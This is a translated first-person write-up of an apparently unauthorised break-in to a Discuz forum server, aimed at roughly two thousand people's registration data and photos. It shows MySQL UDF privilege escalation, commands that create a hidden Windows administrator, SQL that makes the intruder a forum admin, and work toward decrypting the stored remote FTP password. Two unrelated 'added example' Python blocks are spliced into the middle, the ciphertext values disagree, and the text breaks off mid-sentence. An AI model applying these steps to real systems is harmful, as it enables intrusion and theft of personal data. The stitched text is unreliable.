Tool-free ideas: from a Discuz forum to decrypting the remote FTP attachment settings during a penetration test

Source: Internet
Author: User
Tags: mysql commands, mysql injection, remote ftp server, website server, mysql command line

First, this work builds on what others had already achieved. A brief description of the server situation:
The target holds the registration information and photos of about two thousand people. The website server and the photo storage server are separate machines, and permissions are set very strictly. No PHP functions are disabled, but executed commands return no output, and the website directory cannot be listed (only some sub-directories can be listed and some of their files read). The website runs on Windows + IIS6 + PHP + MySQL with a Discuz forum; the Discuz forum attachments (the photos, i.e. the actual target) are stored on another Windows + IIS6 + Serv-U + ASP server. On the website server, the MySQL database forbids SHOW and similar statements for listing databases and columns, but file_priv is enabled, so load_file and INTO OUTFILE work.
Step 1: Obtain a webshell on a website hosted on the same server as the Discuz forum. I will not describe the steps; there is nothing technical about them. After reading the source of the other site on the same server, I found that the seemingly powerful program had usable weaknesses such as FCKeditor, a brute-forceable admin login, uninitialized global POST variables, and apparent MySQL injection... Besides, this webshell is not one I obtained myself, so I will not write up the process.
Step 2: Obtain server permissions. A DLL backdoor for UDF privilege escalation was compiled from open source code found online. After the DLL file is hex-encoded (easier to do on Linux), it is written out to the server and a user-defined function is created (there are many online tutorials for this, and many webshells already integrate a ready-made MySQL UDF privilege escalation module). Not much more to say about this.
Okay. Now the main text.
Step 3 officially begins.
As mentioned above, the home directory of the website cannot be read on the website server; only some sub-directories can be listed and read, and content cannot be edited. Finding the right directory is difficult. A Google search for the keywords:
site:website.com inurl:.php
In this way, you only need to read the content of the file found this way directly in the webshell, or use the injection point to load_file it. Fortunately, the include folder is readable. In this way, the MySQL account and password were obtained.
As mentioned above, MySQL cannot list databases and tables through SHOW, and the website does not allow executing commands or listing directories, which is troublesome.
However, since the system is Windows, I thought of UDF privilege escalation.
Create a user-defined function following the online steps and export udf.dll (via INTO OUTFILE) to the system32 directory. The mysql.func table then looks like this:
name: 6a756c696574
ret:  0
dl:   6d7973716c446c6c2e646c6c
type: function

* Note: the values are displayed in hexadecimal. Decoded, the function name is juliet and the DLL file name is mysqlDll.dll (this file was compiled in advance and written to the server through the INTO OUTFILE operation).
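From the defender's side, the mysql.func table shown above is exactly where a UDF registration like this is visible. The following is an added example, not code from the original write-up, that audits rows of mysql.func against an allow-list of shared libraries an operator has knowingly deployed and decodes columns that a web client displays as hex. SAMPLE_ROWS is constructed: the first row mirrors the hex-displayed name/dl pair above, the second is an invented benign entry; APPROVED_LIBS stands in for a list a DBA would maintain.

```python
"""Audit the mysql.func table for UDF registrations an operator did not deploy.

Added example, not code from the original write-up. SAMPLE_ROWS is constructed
from the hex pair shown in the article plus one invented benign row; APPROVED_LIBS
is an assumed allow-list.
"""
import re

HEX_RE = re.compile(r"^(?:[0-9a-fA-F]{2})+$")

# Return types as stored in mysql.func.ret (0 = STRING, 1 = REAL, 2 = INTEGER).
RET_TYPES = {0: "STRING", 1: "REAL", 2: "INTEGER"}

# Constructed allow-list of shared libraries that are supposed to be loadable.
APPROVED_LIBS = {"lib_mysqludf_json.so"}

# Constructed sample of what `SELECT name, ret, dl, type FROM mysql.func` might show.
SAMPLE_ROWS = [
    {"name": "6a756c696574", "ret": 0, "dl": "6d7973716c446c6c2e646c6c", "type": "function"},
    {"name": "json_get", "ret": 0, "dl": "lib_mysqludf_json.so", "type": "function"},
]


def decode_field(value: str) -> str:
    """Some web-based SQL clients show text columns as hex; decode those, leave the rest alone."""
    if HEX_RE.match(value):
        try:
            return bytes.fromhex(value).decode("utf-8")
        except UnicodeDecodeError:
            pass
    return value


def audit_func_rows(rows):
    """Return one (name, library, return_type, reasons) tuple per row that needs review."""
    findings = []
    for row in rows:
        name = decode_field(row["name"])
        lib = decode_field(row["dl"])
        reasons = []
        if lib not in APPROVED_LIBS:
            reasons.append("library is not on the approved list")
        if "/" in lib or "\\" in lib:
            # MySQL resolves dl relative to plugin_dir; an explicit path is unusual.
            reasons.append("dl column contains a path component")
        if reasons:
            findings.append((name, lib, RET_TYPES.get(row["ret"], "?"), reasons))
    return findings


if __name__ == "__main__":
    for name, lib, ret, reasons in audit_func_rows(SAMPLE_ROWS):
        print(f"{name}() -> {ret} from {lib}: {'; '.join(reasons)}")
```

Run against the real table, the query output would replace SAMPLE_ROWS; the decode step matters because some shells render every text column as hex, which is why the registration above reads as 6a756c696574 rather than juliet.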
In this way, I only need to execute:
juliet("net user")
to run the cmd command placed between the quotation marks.
After some busy work:
juliet("net user")
juliet("net user mysql /add")
juliet("net localgroup administrators mysql /add")
juliet("query user")
juliet("logoff 2")
I logged on to the server.

After getting onto the server, I found that the attachments were not on this server at all. I am not familiar with the MySQL command line, but I could see the database name of the Discuz forum: aaa.
So I went back to the old webshell days and executed MySQL commands from the webshell.
First register an account on the Discuz forum (remember its uid, here 215872), then execute:
UPDATE aaa.cdb_members SET adminid = 1 WHERE uid = 215872
This adds the account to the Discuz administrator list.
I went in through the forum admin center and found that the attachments were 170 GB, but they were on a remote FTP server, which was very discouraging...

Okay, I backed up the user data and had the first piece of data I wanted.

The second piece of data required cracking the Discuz remote attachment server FTP settings.
As for how to obtain the remote FTP details, many people say to look in the configuration file. But it is not in the configuration file. From the admin panel I could see that the FTP host is set to 61.160.220.*. Searching the contents on the server turned up nothing related... clearly it is not in the configuration file.

In the Discuz forum's admin configuration, the remote FTP attachment server settings are fully encrypted. The password box only displays the first and last characters of the password; however long the FTP password is, there are always eight * in the middle. Right-clicking to view the page source of the settings page shows that the FTP password box is a text/password input whose value is masked. So the data clearly already exists in the database.
The URL of the remote attachment settings page in the admin panel is
/admincp.php?action=settings&operation=attach

I read the contents of the settings.inc.php file in the admin directory and searched for the string attach, finding the following code:
elseif($operation == 'attach') {
    $anchor = in_array($anchor, array('basic', 'image', 'remote', 'antileech')) ? $anchor : 'basic';
    showsubmenuanchors('settings_attach', array(
        array('settings_attach_basic', 'basic', $anchor == 'basic'),
        array('settings_attach_image', 'image', $anchor == 'image'),
        $isfounder ? array('settings_attach_remote', 'remote', $anchor == 'remote') : '',
        array('settings_attach_antileech', 'antileech', $anchor == 'antileech'),
    ));
Together with the code at the start of this file:
$settings = array();
$query = $db->query("SELECT * FROM {$tablepre}settings");
I looked through the cdb_settings table and found the FTP settings.
The content of cdb_settings.ftp (the row with variable = 'ftp') is as follows:
a:15:{s:2:"on";s:1:"1";s:3:"ssl";s:1:"0";s:4:"host";s:13:"61.160.220.*";s:4:"port";s:2:"21";s:8:"username";s:12:"XXXX";s:8:"password";s:55:"3a21S+rVfCmuxzYWRk2Fos5w0viyh/CvuO78YfVMlK2Gmu1UZ2XiVVk";s:4:"pasv";s:1:"1";s:9:"attachdir";s:17:"./web/attachments";s:9:"attachurl";s:41:"http://photo.XXXXXXX.cn/";s:7:"timeout";s:1:"0";s:6:"mirror";s:1:"1";s:11:"allowedexts";s:25:"jpg
gif
rar
tar

zip";s:14:"disallowedexts";s:14:"exe
txt
word";s:7:"minsize";s:1:"0";s:7:"hideurl";s:1:"0";}
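The value above is the output of PHP's serialize(), which is what Discuz persists in cdb_settings.value; every string carries its byte length, which is why the allowedexts value can span several lines without breaking the record. Below is an added example, my own code and not part of the article or of Discuz, of a small parser for that format, useful for inspecting such rows offline when reviewing what a forum installation has stored. SAMPLE_FTP_SETTINGS is constructed: it mirrors the key layout of the cdb_settings.ftp row above but uses placeholder host, username and password values.

```python
"""Parse the PHP serialize() format used by Discuz for cdb_settings values.

Added example, not code from the article or from Discuz. SAMPLE_FTP_SETTINGS is a
constructed record with the same keys as the cdb_settings.ftp row in the article;
host, username and password are placeholders.
"""


def php_unserialize(data: bytes):
    """Decode one serialized PHP value; raise ValueError on malformed input."""
    value, pos = _parse(data, 0)
    if pos != len(data):
        raise ValueError(f"trailing bytes after offset {pos}")
    return value


def _parse(data: bytes, pos: int):
    tag = chr(data[pos])
    if tag == "N":                                  # N;
        return None, pos + 2
    if tag in "ibd":                                # i:42;  b:1;  d:1.5;
        end = data.index(b";", pos)
        raw = data[pos + 2:end].decode()
        val = {"i": int, "b": lambda r: r == "1", "d": float}[tag](raw)
        return val, end + 1
    if tag == "s":                                  # s:<bytelen>:"<bytes>";
        colon = data.index(b":", pos + 2)
        length = int(data[pos + 2:colon])
        start = colon + 2                           # skip :"
        end = start + length                        # length counts bytes, newlines included
        if data[end:end + 2] != b'";':
            raise ValueError(f"declared length {length} does not match data at offset {pos}")
        return data[start:end].decode("utf-8"), end + 2
    if tag == "a":                                  # a:<count>:{key value ... }
        colon = data.index(b":", pos + 2)
        count = int(data[pos + 2:colon])
        pos = colon + 2                             # skip :{
        result = {}
        for _ in range(count):
            key, pos = _parse(data, pos)
            val, pos = _parse(data, pos)
            result[key] = val
        if data[pos:pos + 1] != b"}":
            raise ValueError(f"array not closed at offset {pos}")
        return result, pos + 1
    raise ValueError(f"unsupported tag {tag!r} at offset {pos}")


# Constructed sample row: same 15 keys as cdb_settings.ftp, placeholder values.
SAMPLE_FTP_SETTINGS = (
    b'a:15:{s:2:"on";s:1:"1";s:3:"ssl";s:1:"0";'
    b's:4:"host";s:12:"203.0.113.10";s:4:"port";s:2:"21";'
    b's:8:"username";s:7:"ftpuser";'
    b's:8:"password";s:22:"PLACEHOLDER-CIPHERTEXT";'
    b's:4:"pasv";s:1:"1";s:9:"attachdir";s:17:"./web/attachments";'
    b's:9:"attachurl";s:25:"http://photo.example.com/";'
    b's:7:"timeout";s:1:"0";s:6:"mirror";s:1:"1";'
    b's:11:"allowedexts";s:25:"jpg\r\ngif\r\nrar\r\ntar\r\n\r\nzip";'
    b's:14:"disallowedexts";s:14:"exe\r\ntxt\r\nword";'
    b's:7:"minsize";s:1:"0";s:7:"hideurl";s:1:"0";}'
)


def extension_lists(settings: dict):
    """Split the newline-separated extension lists into clean Python lists."""
    return (settings["allowedexts"].split(), settings["disallowedexts"].split())


if __name__ == "__main__":
    cfg = php_unserialize(SAMPLE_FTP_SETTINGS)
    for k, v in cfg.items():
        print(f"{k:15} {v!r}")
```

Because the parser trusts the declared byte counts rather than scanning for quotes, a value containing quotes, semicolons or line breaks is read back exactly; a row whose counts no longer match its content (for example after a careless manual edit of the table) is rejected instead of being silently misread, which is also how PHP's own unserialize() behaves.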
Obviously, from the admin configuration, the FTP password is not 3a21S+rVfCmuxzYWRk2Fos5w0viyh/CvuO78YfVMlK2Gmu1UZ2XiVVk. This is the encrypted form.

My first thought, based on the length of the value, was base64 decoding. But the decoded result is:
|) 6FM ge?
All garbled characters... There must be something else. I found the encryption and decryption function in the global file of the include directory and built a decryption page myself:
<?php
$aaa = '206crkvkfJEsv1jO5e3CIJugXciKyQ0B/JykVCk4YmNBbURJSy0mceI'; // the encrypted ftp password
$operation = 'DECODE'; // set it to decryption mode?

function authcode($string, $operation, $key = '') {
    $key = md5($key ? $key : $GLOBALS['discuz_auth_key']);
    $key_length = strlen($key);
    // DECODE: base64-decode the ciphertext; ENCODE: prepend an 8-char md5 check value
    $string = $operation == 'DECODE' ? base64_decode($string) : substr(md5($string.$key), 0, 8).$string;
    $string_length = strlen($string);
    $rndkey = $box = array();
    $result = '';
    // key scheduling: expand the key over a 256-entry box
    for($i = 0; $i <= 255; $i++) {
        $rndkey[$i] = ord($key[$i % $key_length]);
        $box[$i] = $i;
    }
    for($j = $i = 0; $i < 256; $i++) {
        $j = ($j + $box[$i] + $rndkey[$i]) % 256;
        $tmp = $box[$i];
        $box[$i] = $box[$j];
        $box[$j] = $tmp;
    }
    // keystream generation XORed over the input, one byte at a time
    for($a = $j = $i = 0; $i < $string_length; $i++) {
        $a = ($a + 1) % 256;
        $j = ($j + $box[$a]) % 256;
        $tmp = $box[$a];
        $box[$a] = $box[$j];
        $box[$j] = $tmp;
        $result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));
    }
    if($operation == 'DECODE') {
        // the first 8 characters must match the md5 check of the rest; otherwise the key was wrong
        if(substr($result, 0, 8) == substr(md5(substr($result, 8).$key), 0, 8)) {
            return substr($result, 8);
        } else {
            return '';
        }
    } else {
        return str_replace('=', '', base64_encode($result));
    }
}

$aaa = base64_decode($aaa); // "decrypt" the ciphertext (note: this only base64-decodes it and never calls authcode)
echo $aaa; // output the decoded content
?>
As a result, the base64-decoded content was output directly to me....

It seems this is not so easy to decrypt after all. After carefully reading the source code, it looked like an auth_key was missing. There is indeed an authkey entry in the settings table in the database; its content is 99dc6cae3cN9t4R4. After adding it, the result was still wrong; this time nothing was output at all... I searched again for files whose source contains discuz_auth_key and studied them. It is really complicated... I wanted to try another path rather than get stuck.

Later, I thought I could start from the admin panel display instead and make the panel show the decrypted content directly, without adding any asterisks. Yes.

Comparing the code in the settings.inc.php file, I finally pinned it down to the checktools.inc.php file.

The code that masks the password with asterisks is as follows:
if(!empty($settingsnew['ftp']['password'])) {
    // reload the stored ftp settings and decrypt the saved password with md5($authkey) as the authcode key
    $settings['ftp'] = unserialize($db->result_first("SELECT value FROM {$tablepre}settings WHERE variable='ftp'"));
    $settings['ftp']['password'] = authcode($settings['ftp']['password'], 'DECODE', md5($authkey));
    $pwlen = strlen($settingsnew['ftp']['password']);
    // if the submitted value is first char + eight * + last char of the stored password, keep the stored one
    if($settingsnew['ftp']['password'][0] == $settings['ftp']['password'][0]
        && $settingsnew['ftp']['password'][$pwlen - 1] == $settings['ftp']['password'][strlen($settings['ftp']['password']) - 1]
        && substr($settingsnew['ftp']['password'], 1, $pwlen - 2) == '********') {
        $settingsnew['ftp']['password'] = $settings['ftp']['password'];
    }
}
I suddenly realized that the original decryption code was
